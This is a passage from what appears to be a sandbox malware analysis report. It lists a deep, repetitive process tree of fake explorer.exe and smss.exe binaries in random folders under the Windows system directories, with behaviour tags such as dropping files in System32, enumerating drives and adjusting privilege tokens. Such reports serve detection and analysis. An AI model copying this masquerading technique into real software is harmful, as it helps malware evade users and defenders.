        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        11⤵
        
        PID:11752
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:12932
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:14320
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:6896
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        10⤵
        
        PID:10564
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:11352
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:12464
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:14056
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:6964
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:19292
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        9⤵
        
        PID:9680
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:9224
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:11088
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:12172
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        Enumerates connected drives
        
        PID:13584
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:14516
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:18404
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:25460
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        8⤵
        
        PID:4416
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        
        PID:9080
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:9728
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:10368
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:5004
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:13736
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:14684
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:16512
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:6352
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        7⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        
        PID:7280
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        Drops file in System32 directory
        
        PID:7804
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:7948
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:8624
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:9052
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:9284
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:10992
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:12048
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:13260
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:14140
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:18268
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:25520
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        8⤵
        
        PID:25816
    - - C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1756
      - C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:752
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1196
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        Drops file in System32 directory
        
        PID:464
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        Drops file in System32 directory
        
        PID:5276
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:6376
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:6748
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        Drops file in System32 directory
        
        PID:6244
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:7104
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:7660
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:7384
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:8412
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:3388
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        Enumerates connected drives
        
        PID:10032
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:10796
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        Enumerates connected drives
        
        PID:11660
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:12760
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:13404
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:18152
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:19096
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:16320
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:6360
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        
        PID:6220
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:17796
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        Enumerates connected drives
        
        PID:15140
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:6864
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        
        PID:14772
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:16680
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:19752
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        
        PID:14000
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:17544
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:24248
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        11⤵
        
        PID:12488
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:14136
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:16788
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        10⤵
        
        PID:11464
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:12692
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:14332
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:17348
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:23464
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        9⤵
        
        PID:10632
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:11448
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:12576
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:14048
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:16408
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:19012
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        8⤵
        
        PID:9456
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        
        PID:9376
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:10316
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:11972
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:13448
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:14392
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:17288
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:23520
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        7⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        
        PID:9148
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        
        PID:9776
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:10436
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:13784
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:14716
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:16804
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:19640
      - C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        6⤵
        
        PID:6756
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        7⤵
        
        PID:7604
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        
        PID:8160
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        
        PID:8324
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:8676
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:9972
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:10736
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:11572
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:12640
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:14144
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:17612
  - - C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
      C:\Windows\system32\cvnveiwhktia\explorer.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2352
    - - C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4332
      - C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        6⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:4020
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1760
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Enumerates connected drives
        
        PID:6468
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:6848
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:6344
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:7228
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:7764
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        Drops file in System32 directory
        
        PID:7876
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        Drops file in System32 directory
        
        PID:8524
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:10212
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:10912
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:11880
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:12976
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:13352
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:17392
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:23876
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:19232
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:25844
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        
        PID:16560
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:19688
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        
        PID:14444
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:18080
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:24680
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        
        PID:15172
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:16180
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:19028
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        
        PID:14804
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:16664
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:19524
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        11⤵
        
        PID:14100
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:17420
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        10⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:12556
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:14128
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:17108
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        9⤵
        
        PID:11532
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:12700
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:14268
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:17296
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:23536
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        8⤵
        
        PID:10584
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        
        PID:11308
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:12372
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        Enumerates connected drives
        
        PID:13980
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:19104
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        7⤵
        
        PID:9696
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        Drops file in System32 directory
        
        PID:9272
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        
        PID:11104
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:13596
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:14528
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:16908
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:19004
      - C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        6⤵
        Drops file in System32 directory
        
        PID:7524
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        7⤵
        
        PID:9112
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
